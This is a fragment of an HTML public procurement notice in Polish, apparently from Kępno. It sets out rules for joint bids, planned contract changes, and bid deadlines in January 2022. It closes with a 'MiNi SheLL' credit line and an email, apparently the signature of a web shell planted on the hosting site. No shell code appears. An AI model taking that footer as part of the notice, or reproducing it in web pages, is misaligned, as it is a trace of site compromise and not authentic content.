dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określa załacznik nr 4 do SWZ -<br/>umowa <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/kepno</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-11 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com